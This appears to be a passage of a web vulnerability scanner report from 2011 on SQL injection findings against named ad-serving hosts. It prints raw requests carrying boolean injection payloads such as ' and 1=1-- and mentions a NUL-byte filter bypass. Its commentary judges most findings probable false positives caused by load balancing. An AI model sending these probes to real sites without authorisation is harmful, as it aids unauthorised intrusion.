Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: N7ADWEB05
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:05:08 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /ad'%20and%201%3d2--%20/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif?clickTag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clickTAG=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clicktag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D HTTP/1.1
Host: adsatt.abc.starwave.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
From: n7adweb02
Content-Length: 1245
Date: Sat, 17 Sep 2011 01:05:08 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>404 - File or directory not found.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>404 - File or directory not found.</h2>
<h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>
</fieldset></div>
</div>
</body>
</html>

1.5. http://adsatt.abc.starwave.com/ad/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://adsatt.abc.starwave.com
Path:   /ad/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 (' and 1=1-- and ' and 1=2-- , URL-encoded) were each submitted in the REST URL parameter 2. The two requests produced different responses, which the scanner reads as a sign that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection are unreliable and prone to false positives, so review the reported requests and responses before accepting the finding. As in 1.4, both responses are stock IIS 404 pages from two different nodes (From: N7ADWEB05 on Microsoft-IIS/6.0, then From: n7adweb02 on Microsoft-IIS/7.5), each with its own default 404 page. The difference the scanner measured is the load balancer, not a query. Treat this as a probable false positive unless the same pair, answered by the same node, still differs.

Request 1

GET /ad/sponsors'%20and%201%3d1--%20/Procter_Gamble/Sep_2011/proc-240x30-0036.gif?clickTag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clickTAG=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clicktag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D HTTP/1.1
Host: adsatt.abc.starwave.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: N7ADWEB05
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:05:08 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /ad/sponsors'%20and%201%3d2--%20/Procter_Gamble/Sep_2011/proc-240x30-0036.gif?clickTag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clickTAG=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clicktag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D HTTP/1.1
Host: adsatt.abc.starwave.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
From: n7adweb02
Content-Length: 1245
Date: Sat, 17 Sep 2011 01:05:08 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>404 - File or directory not found.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>404 - File or directory not found.</h2>
<h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>
</fieldset></div>
</div>
</body>
</html>

1.6. http://adsatt.abc.starwave.com/ad/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://adsatt.abc.starwave.com
Path:   /ad/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 19227397'%20or%201%3d1--%20 and 19227397'%20or%201%3d2--%20 (a random numeric prefix followed by ' or 1=1-- and ' or 1=2-- , URL-encoded) were each submitted in the REST URL parameter 3. The two requests produced different responses, which the scanner reads as a sign that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection are unreliable and prone to false positives, so review the reported requests and responses before accepting the finding. The pattern is the same as in 1.4 and 1.5: two stock IIS 404 pages, one from N7ADWEB05 (Microsoft-IIS/6.0) and one from n7adweb02 (Microsoft-IIS/7.5), differing only in which node's default error page was returned. Treat this as a probable false positive unless the same pair, answered by the same node, still differs.

Request 1

GET /ad/sponsors/Procter_Gamble19227397'%20or%201%3d1--%20/Sep_2011/proc-240x30-0036.gif?clickTag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clickTAG=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clicktag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D HTTP/1.1
Host: adsatt.abc.starwave.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: N7ADWEB05
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:05:09 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /ad/sponsors/Procter_Gamble19227397'%20or%201%3d2--%20/Sep_2011/proc-240x30-0036.gif?clickTag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clickTAG=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clicktag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D HTTP/1.1
Host: adsatt.abc.starwave.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
From: n7adweb02
Content-Length: 1245
Date: Sat, 17 Sep 2011 01:05:09 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>404 - File or directory not found.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>404 - File or directory not found.</h2>
<h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>
</fieldset></div>
</div>
</body>
</html>

1.7. http://adsatt.abc.starwave.com/ad/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://adsatt.abc.starwave.com
Path:   /ad/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 (' and 1=1-- and ' and 1=2-- , URL-encoded) were each submitted in the REST URL parameter 4. The two requests produced different responses, which the scanner reads as a sign that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection are unreliable and prone to false positives, so review the reported requests and responses before accepting the finding. This is the fourth path segment of the same .gif URL and the evidence is identical to 1.4 through 1.6: a stock Microsoft-IIS/6.0 404 page from N7ADWEB05 for the 1=1 request and a stock Microsoft-IIS/7.5 404 page from n7adweb02 for the 1=2 request. Four "vulnerable" segments of one static image path, each backed only by a mismatched pair of default error pages, is the signature of a load-balanced false positive rather than of four injection points.

Request 1

GET /ad/sponsors/Procter_Gamble/Sep_2011'%20and%201%3d1--%20/proc-240x30-0036.gif?clickTag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clickTAG=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clicktag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D HTTP/1.1
Host: adsatt.abc.starwave.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: N7ADWEB05
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:05:10 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /ad/sponsors/Procter_Gamble/Sep_2011'%20and%201%3d2--%20/proc-240x30-0036.gif?clickTag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clickTAG=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clicktag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D HTTP/1.1
Host: adsatt.abc.starwave.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
From: n7adweb02
Content-Length: 1245
Date: Sat, 17 Sep 2011 01:05:10 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>404 - File or directory not found.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>404 - File or directory not found.</h2>
<h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>
</fieldset></div>
</div>
</body>
</html>

1.8. http://amch.questionmarket.com/adsc/d775029/8/923517/decide.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /adsc/d775029/8/923517/decide.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1 and a general error message was returned; two single quotes (an escaped quote in SQL) were then submitted and the error message disappeared. Review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The scanner also reports that the application attempts to block SQL injection but that the block can be circumvented by placing a URL-encoded NULL byte (%00) before the filtered characters. The two requests below do not bear this out. Both responses are 404 Not Found, served by different nodes (Server: Apache with a 1402-byte localized error page for Request 1, Server: Apache/2.2.14 (Ubuntu) with the 291-byte default page for Request 2), and the second one echoes the requested URL as plain /adsc, so everything from the NUL onward was discarded before the error page was built. Apache rejects a path containing a decoded NUL with a 404 of its own, so the request most likely never reached decide.php. Neither response is a database error; the "error message" the scanner keyed on is a generic not-found page. Treat the finding as unconfirmed.

Remediation detail

